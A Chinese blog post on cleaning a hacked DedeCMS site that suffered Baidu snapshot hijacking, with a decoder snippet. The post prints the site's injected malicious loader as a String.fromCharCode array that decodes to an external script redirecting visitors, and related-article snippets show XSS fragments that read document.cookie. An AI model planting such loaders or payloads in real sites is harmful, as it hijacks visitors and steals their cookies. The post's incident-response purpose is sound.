百度快照劫持的解决方法

最新推荐文章于 2024-07-23 08:56:57 发布
最新推荐文章于 2024-07-23 08:56:57 发布
阅读量780 收藏
点赞数
分类专栏: 学习琐事 文章标签: 数据库 php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108759040
版权 
阿里云的轻量级服务器、新网的域名、dedecms

篡改密码

被篡改密码,可以使用一些数据库管理的工具来查看被改的密码,我这里用的是phpmyadmin

http://域名/phpMyAdmin

在这里插入图片描述
输入自己的数据库账号和密码(默认都是root),我这里是阿里云的密码
在这里插入图片描述
点击默认生成的数据库里面的默认存放管理员的账号、密码dede_admin在这里插入图片描述
里面的uname为账号,pwd为密码(md5值),用下方的在线解密

https://www.somd5.com/

在这里插入图片描述
拿着解开的密码去登陆就OK了

百度快照劫持

发现的过程:
在这里插入图片描述
如上方可见,点击进去就会跳转到bc网站。
打开我们网站的源代码(f12)可见:
在这里插入图片描述
看似是乱码,其实是unicode编码
在这里插入图片描述
解码:
在这里插入图片描述
这里则是百度后(String.fromCharCode)

fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串

在这里插入图片描述
把下面的代码保存到一个html文件,把数字输入进去然后打开

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>

<p id="a">出现吧!</p>

<script>
	var n=String.fromCharCode(115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,100,100,46,106,115,34,62,47,115,99,114,105,112,116,62);
	document.getElementById("a").innerHTML=n;
</script>

</body>
</html>

在这里插入图片描述
得到以下网址,打开得到以下界面:在这里插入图片描述
百度了一下才知道是百度快照劫持,那么我们怎么解决呢,百度啊!
解决办法:
下面是我的解决方法:先打开ftp然后打开存在哪些html的源码,清除之后可以看到整个世界都清净了
在这里插入图片描述
然后我们可以打包源码到本地,然后用一些杀毒软件和一些安全狗、D盾等,这里我用的是火绒
在这里插入图片描述
点击病毒查杀----自定义查杀-----选择打包的源码等文件
在这里插入图片描述
或者看看根目录是否存在一些你网站本来没有的东西
在这里插入图片描述
可以看到这里有个aaa.php就是一个免杀的木马,奈斯,直接获得一枚,有发现木马的可以给我:3075999532

p_utao
关注
专栏目录
php获取网站百度快照日期的方法
12-18
标题中的“php获取网站百度快照日期的方法”指的是在PHP编程语言中,通过编写特定的代码来抓取并显示一个网站在百度搜索引擎上的最新快照日期。这通常用于监测网站的更新频率或SEO优化效果。描述中提供的HTML代码是...
百度快照劫持怎么解决百度快照劫持如何排除?百度快照劫持如何修复?
seven9711的博客
12-30 666
所有被挂了跳转链接的网页中绝大多数都是建立在网站被getshell的基础上的,所以当你在维护网站的时候不能仅仅只删除js代码,还要系统性的对网站内的文件进行对比找出后门,不然只是治标不治本。 下面是“排除快照劫持”的解决方法(持续更新中…): 1.首页被快照劫持,查询下默认文件index.php(index.html)代码,删除头部快照劫持代码(可搜索baidu,360,sogou,google…等字符),并设置首页默认文i件为只读,防止后门持续上传。 2. 看网站目录内有没有被上传的tools目录或too
xss漏洞挖掘与绕过学习总结
qq_40529133的博客
04-16 2231
xss漏洞普遍存在于数据交互的地方,像常见的登录,搜索,留言,评论等用户可以输入的地方。 挖掘xss大体上可以分为两种: 一,手动挖掘 二,利用工具自动化挖掘 一,手工挖掘 利用火狐中常见的XSS 调试插件: Hackbar; Firebar; Tamper Data; (1)Hackbar:比较常用的测试插件,支持post,get两种请求方式。 (1),可以对我们的字符串进行编码:像常见的&lt...
心心念念的火绒来了
最新发布
weixin_64944512的博客
07-23 445
软件克星------火绒
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 4699
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
XSS绕过技巧
weixin_52501704的博客
02-10 4755
XSS绕过技巧
XSS 跨站测试代码大全2
LIVE
11-07 1301
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
php获取百度收录、百度热词及百度快照方法
12-18
PHP获取百度快照日期的方法】 获取网站的百度快照日期,同样需要发送HTTP请求到百度搜索页面并解析返回的HTML。以下是一个示例: ```php function baiduSnapshot($domain) { $site_url = '...
您所查看的网页不允许百度保存其快照的设置方法
12-13
今天在百度搜索一个页面的时候,因为页面已经被删除,所以就自然而然用百度快照,打开百度快照,却显示:对不起,您所查看的网页不允许百度保存其快照,所以想到把如何设置禁止百度快照缓存的方法写下来,方法如下:...
黄猫百度快照更新工具 v2018
11-08
【黄猫百度快照更新工具 v2018】是一款专为网站管理员设计的实用工具,主要用于加速百度搜索引擎对网站快照的更新。在互联网世界中,网站快照是搜索引擎抓取并保存的网页副本,它反映了搜索引擎最后一次访问并记录...
百度当天快照软件
12-26
百度快照百度快照快速更新软件
xss各种绕过收集(更新完毕)
weixin_34021089的博客
04-15 1027
xss各种绕过收集(更新完毕)<a href="javascrip:alert(document.cookie)"> 用a标签来弹窗"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99...
兽哥出品---->XSS漏洞的原理与剖析
weixin_34133829的博客
07-15 144
Xss(跨站脚本***)今天 兽哥又给大家带来一份干货,关于xss漏洞问题Xss是一种基于html属性的*** 这是一种比较简单的方法 然而现在存在xss漏洞已经很少了但是..注意 这里我用到了但是 我在挂代理 去国外找网站时 我发现某个渣渣国的很多很多网站存xss漏洞 随便掏了一个给大家做一下尝试 讲解原...
一次有趣的XSS漏洞挖掘分析(1)
weixin_34050005的博客
01-03 174
最近认识了个新朋友,天天找我搞XSS。搞了三天,感觉这一套程序还是很有意思的。因为是过去式的文章,所以没有图。但是希望把经验分享出来,可以帮到和我一样爱好XSS的朋友。我个人偏爱富文本XSS,因为很有趣。有趣的地方是你需要一点一点的测试都过滤了些什么,怎么过滤的。我想,这也是黑盒测试最让人着迷的地方吧首先,锁定了提交问题的模块,因为这块有编辑器。然后开始fuzz filter规则。一共有两...
Web安全-浅析网页暗链与挂马攻击
热门推荐
道阻且长,行则将至。
02-28 1万+
文章目录前言暗链现状暗链隐蔽性暗链产业链暗链的危害暗链的防御暗链实例暗链技术HTML隐藏型JS引入型暗链暗链检测思路 前言 近年来,随着国家相关部门对互联网安全事件的重视、部分软件开发厂商安全意识的提高,曾经红极一时的“挂马”攻击手段已经日趋减少,特别是 2009 年刑法明确“挂马”事件量刑标准之后,多个曾经猖狂一时的 ”挂马” 集团相继落网,“挂马”这种风险高且收益不稳定的攻击手段逐步为黑色产业链所抛弃。黑色产业链是否因为挂马的衰落而就此沉寂呢?答案是否定的,攻击手段日新月异,其中“暗链”是近年来较为严重
百度快照劫持该如何处理?
鹏鹏SEO博客
04-08 2564
前段时间一个站长朋友告诉我说;百度快照劫持了,应该如何处理。很多站长都知道,百度快照劫持是黑帽SEO的一种手段(就是学了皮毛的黑客技术)为了宣传自己网站流量为目的,对一些网站进行了劫持,对于这样的问题,重庆SO鹏鹏就为各位讲一讲有关百度快照劫持的问题。一、百度快照劫持有那些特征如上图所示通过搜索关键词或直接在搜索引擎输入网址访问跳转到另外一个和搜索引擎抓取的完全不同的网站,点击打开后为非法灰色...
利用快照功能进行数据恢复:NAS存储的高效解决方案
实验目的是让学习者熟悉快照功能的使用,掌握在RG-iS-LAB平台上配置快照并执行数据恢复操作的方法。 【快照功能详解】 快照是一种高效的数据保护机制,它能在不中断业务运行的情况下,捕获数据在某一特定时间点的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值